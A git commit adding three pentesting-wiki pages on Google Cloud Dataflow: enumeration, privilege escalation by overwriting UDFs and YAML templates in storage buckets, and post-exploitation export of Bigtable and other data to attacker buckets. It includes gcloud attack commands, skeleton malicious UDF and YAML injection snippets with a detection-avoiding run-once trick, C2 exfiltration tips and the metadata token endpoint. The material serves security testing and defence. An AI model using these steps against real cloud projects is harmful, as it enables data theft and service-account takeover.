added new GCP Dataflow exploitation, privilege escalation, and enumeration sections

2026-03-12 21:22:57 -07:00 · 2026-02-15 21:34:08 +02:00
parent 3724e2729a
commit 936fbc4285
4 changed files with 304 additions and 0 deletions
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -95,6 +95,7 @@
    - [GCP - Cloud Shell Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md)
    - [GCP - Cloud SQL Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md)
    - [GCP - Compute Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md)
    - [GCP - Dataflow Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md)
    - [GCP - Filestore Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md)
    - [GCP - IAM Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md)
    - [GCP - KMS Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md)
@@ -123,6 +124,7 @@
    - [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md)
    - [GCP - Container Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md)
    - [GCP - Dataproc Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md)
    - [GCP - Dataflow Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md)
    - [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md)
    - [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md)
    - [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md)
@@ -176,6 +178,7 @@
      - [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md)
    - [GCP - Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md)
    - [GCP - Containers & GKE Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md)
    - [GCP - Dataflow Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md)
    - [GCP - Dataproc Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.md)
    - [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md)
    - [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md)
--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md
@@ -0,0 +1,49 @@
 # GCP - Dataflow Post Exploitation
 {{#include ../../../banners/hacktricks-training.md}}
 ## Dataflow
 For more information about Dataflow check:
 {{#ref}}
 ../gcp-services/gcp-dataflow-enum.md
 {{#endref}}
 ### Using Dataflow to exfiltrate data from other services
 **Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs` (over a SA with access to source and sink)
 With Dataflow job creation rights, you can use GCP Dataflow templates to export data from Bigtable, BigQuery, Pub/Sub, and other services into attacker-controlled GCS buckets. This is a powerful post-exploitation technique when you have obtained Dataflow access—for example via the [Dataflow Rider](../gcp-privilege-escalation/gcp-dataflow-privesc.md) privilege escalation (pipeline takeover via bucket write).
 > [!NOTE]
 > You need `iam.serviceAccounts.actAs` over a service account with sufficient permissions to read the source and write to the sink. By default, the Compute Engine default SA is used if not specified.
 #### Bigtable to GCS
 See [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md#dump-rows-to-your-bucket) — "Dump rows to your bucket" for the full pattern. Templates: `Cloud_Bigtable_to_GCS_Json`, `Cloud_Bigtable_to_GCS_Parquet`, `Cloud_Bigtable_to_GCS_SequenceFile`.
 <details>
 <summary>Export Bigtable to attacker-controlled bucket</summary>
 ```bash
 gcloud dataflow jobs run <job-name> \
  --gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
  --project=<PROJECT> \
  --region=<REGION> \
  --parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<YOUR_BUCKET>/raw-json/ \
  --staging-location=gs://<YOUR_BUCKET>/staging/
 ```
 </details>
 #### BigQuery to GCS
 Dataflow templates exist to export BigQuery data. Use the appropriate template for your target format (JSON, Avro, etc.) and point the output to your bucket.
 #### Pub/Sub and streaming sources
 Streaming pipelines can read from Pub/Sub (or other sources) and write to GCS. Launch a job with a template that reads from the target Pub/Sub subscription and writes to your controlled bucket.
 {{#include ../../../banners/hacktricks-training.md}}
--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md
@@ -0,0 +1,173 @@
 # GCP - Dataflow Privilege Escalation
 {{#include ../../../banners/hacktricks-training.md}}
 ## Dataflow
 {{#ref}}
 ../gcp-services/gcp-dataflow-enum.md
 {{#endref}}
 ### `storage.objects.create`, `storage.objects.get`, `storage.objects.update`
 Dataflow does not validate integrity of UDFs and job template YAMLs stored in GCS. 
 With bucket write access, you can overwrite these files to inject code, execute code on the workers, steal service account tokens, or alter data processing.
 Both batch and streaming pipeline jobs are viable targets for this attack. In order to execute this attack on a pipeline we need to replace UDFs/templates before the job runs, during the first few minutes (before the job workers are created) or during the job run before new workers spin up (due to autoscaling).
 **Attack vectors:**
 - **UDF hijacking:** Python (`.py`) and JS (`.js`) UDFs referenced by pipelines and stored in customer-managed buckets
 - **Job template hijacking:** Custom YAML pipeline definitions stored in customer-managed buckets
 > [!WARNING]
 > **Run-once-per-worker trick:** Dataflow UDFs and template callables are invoked **per row/line**. Without coordination, exfiltration or token theft would run thousands of times, causing noise, rate limiting, and detection. Use a **file-based coordination** pattern: check if a marker file (e.g. `/tmp/pwnd.txt`) exists at the start; if it exists, skip malicious code; if not, run the payload and create the file. This ensures the payload runs **once per worker**, not per line.
 #### Direct exploitation via gcloud CLI
 1. Enumerate Dataflow jobs and locate the template/UDF GCS paths:
 <details>
 <summary>List jobs and describe to get template path, staging location, and UDF references</summary>
 ```bash
 # List jobs (optionally filter by region)
 gcloud dataflow jobs list --region=<region>
 gcloud dataflow jobs list --project=<PROJECT_ID>
 # Describe a job to get template GCS path, staging location, and any UDF/template references
 gcloud dataflow jobs describe <JOB_ID> --region=<region> --format="yaml"
 # Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH)
 # Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath
 ```
 </details>
 2. Download the original UDF or job template from GCS:
 <details>
 <summary>Download UDF file or YAML template from bucket</summary>
 ```bash
 # If job references a UDF at gs://bucket/path/to/udf.py
 gcloud storage cp gs://<BUCKET>/<PATH>/<udf_file>.py ./udf_original.py
 # Or for a YAML job template
 gcloud storage cp gs://<BUCKET>/<PATH>/<template>.yaml ./template_original.yaml
 ```
 </details>
 3. Edit the file locally: inject the malicious payload (see Python UDF or YAML snippets below) and ensure the run-once coordination pattern is used.
 4. Re-upload to overwrite the original file:
 <details>
 <summary>Overwrite UDF or template in bucket</summary>
 ```bash
 gcloud storage cp ./udf_injected.py gs://<BUCKET>/<PATH>/<udf_file>.py
 # Or for YAML
 gcloud storage cp ./template_injected.yaml gs://<BUCKET>/<PATH>/<template>.yaml
 ```
 </details>
 5. Wait for the next job run, or (for streaming) trigger autoscaling (e.g. flood the pipeline input) so new workers spin up and pull the modified file.
 #### Python UDF injection
 If you want to have a the worker exfiltrate data to your C2 server use `urllib.request` and not `requests`.
 `requests` is not preinstalled on classic Dataflow workers.
 <details>
 <summary>Malicious UDF with run-once coordination and metadata extraction</summary>
 ```python
 import os
 import json
 import urllib.request
 from datetime import datetime
 def _malicious_func():
    # File-based coordination: run once per worker.
    coordination_file = "/tmp/pwnd.txt"
    if os.path.exists(coordination_file):
        return
    # malicous code goes here
 def transform(line):
    # Malicous code entry point - runs per line but coordination ensures once per worker
    try:
        _malicious_func()
    except Exception:
        pass
    # ... original UDF logic follows ...
 ```
 </details>
 #### Job template YAML injection
 Inject a `MapToFields` step with a callable that uses a coordination file. For YAML-based pipelines that support `requests`, use it if the template declares `dependencies: [requests]`; otherwise prefer `urllib.request`.
 Add the cleanup step (`drop: [malicious_step]`) so the pipeline still writes valid data to the destination. 
 <details>
 <summary>Malicious MapToFields step and cleanup in pipeline YAML</summary>
 ```yaml
 - name: MaliciousTransform
  type: MapToFields
  input: Transform
  config:
    language: python
    fields:
      malicious_step:
        callable: |
          def extract_and_return(row):
              import os
              import json
              from datetime import datetime
              coordination_file = "/tmp/pwnd.txt"
              if os.path.exists(coordination_file):
                  return 
              try:
                  import urllib.request
                 # malicious code goes here
    append: true
 - name: CleanupTransform
  type: MapToFields
  input: MaliciousTransform
  config:
    fields: {}
    append: true
    drop:
      - malicious_step
 ```
 </details>
 ### Compute Engine access to Dataflow Workers
 **Permissions:** `compute.instances.osLogin` or `compute.instances.osAdminLogin` (with `iam.serviceAccounts.actAs` over the worker SA), or `compute.instances.setMetadata` / `compute.projects.setCommonInstanceMetadata` (with `iam.serviceAccounts.actAs`) for legacy SSH key injection
 Dataflow workers run as Compute Engine VMs. Access to workers via OS Login or SSH lets you read SA tokens from the metadata endpoint (`http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token`), manipulate data, or run arbitrary code.
 For exploitation details, see:
 - [GCP - Compute Privesc](gcp-compute-privesc/README.md) — `compute.instances.osLogin`, `compute.instances.osAdminLogin`, `compute.instances.setMetadata`
 ## References
 - [Dataflow Rider: How Attackers can Abuse Shadow Resources in Google Cloud Dataflow](https://www.varonis.com/blog/dataflow-rider)
 {{#include ../../../banners/hacktricks-training.md}}
--- a/src/pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md
@@ -0,0 +1,79 @@
 # GCP - Dataflow Enum
 {{#include ../../../banners/hacktricks-training.md}}
 ## Basic Information
 **Google Cloud Dataflow** is a fully managed service for **batch and streaming data processing**. It enables organizations to build pipelines that transform and analyze data at scale, integrating with Cloud Storage, BigQuery, Pub/Sub, and Bigtable. Dataflow pipelines run on worker VMs in your project; templates and User-Defined Functions (UDFs) are often stored in GCS buckets. [Learn more](https://cloud.google.com/dataflow).
 ## Components
 A Dataflow pipeline typically includes:
 **Template:** YAML or JSON definitions (and Python/Java code for flex templates) stored in GCS that define the pipeline structure and steps.
 **Launcher:** A short-lived Compute Engine instance that validates the template and prepares containers before the job runs.
 **Workers:** Compute Engine VMs that execute the actual data processing tasks, pulling UDFs and instructions from the template.
 **Staging/Temp buckets:** GCS buckets that store temporary pipeline data, job artifacts, UDF files, flex template metadata (`.json`).
 ## Batch vs Streaming Jobs
 Dataflow supports two execution modes:
 **Batch jobs:** Process a fixed, bounded dataset (e.g. a log file, a table export). The job runs once to completion and then terminates. Workers are created for the duration of the job and shut down when done. Batch jobs are typically used for ETL, historical analysis, or scheduled data migrations.
 **Streaming jobs:** Process unbounded, continuously arriving data (e.g. Pub/Sub messages, live sensor feeds). The job runs until explicitly stopped. Workers may scale up and down; new workers can be spawned due to autoscaling, and they will pull pipeline components (templates, UDFs) from GCS at startup.
 ## Enumeration
 Dataflow jobs and related resources can be enumerated to gather service accounts, template paths, staging buckets, and UDF locations.
 ### Job Enumeration
 To enumerate Dataflow jobs and retrieve their details:
 ```bash
 # List Dataflow jobs in the project 
 gcloud dataflow jobs list
 # List Dataflow jobs (by region)
 gcloud dataflow jobs list --region=<region>
 # Describe job (includes service account, template GCS path, staging location, parameters)
 gcloud dataflow jobs describe <job-id> --region=<region>
 ```
 Job descriptions reveal the template GCS path, staging location, and worker service account—useful for identifying buckets that store pipeline components.
 ### Template and Bucket Enumeration
 Buckets referenced in job descriptions may contain flex templates, UDFs, or YAML pipeline definitions:
 ```bash
 # List objects in a bucket (look for .json flex templates, .py UDFs, .yaml pipeline defs)
 gcloud storage ls gs://<bucket>/
 # List objects recursively
 gcloud storage ls gs://<bucket>/** 
 ```
 ## Privilege Escalation
 {{#ref}}
 ../gcp-privilege-escalation/gcp-dataflow-privesc.md
 {{#endref}}
 ## Post Exploitation
 {{#ref}}
 ../gcp-post-exploitation/gcp-dataflow-post-exploitation.md
 {{#endref}}
 ## Persistence
 {{#ref}}
 ../gcp-persistence/gcp-dataflow-persistence.md
 {{#endref}}
 {{#include ../../../banners/hacktricks-training.md}}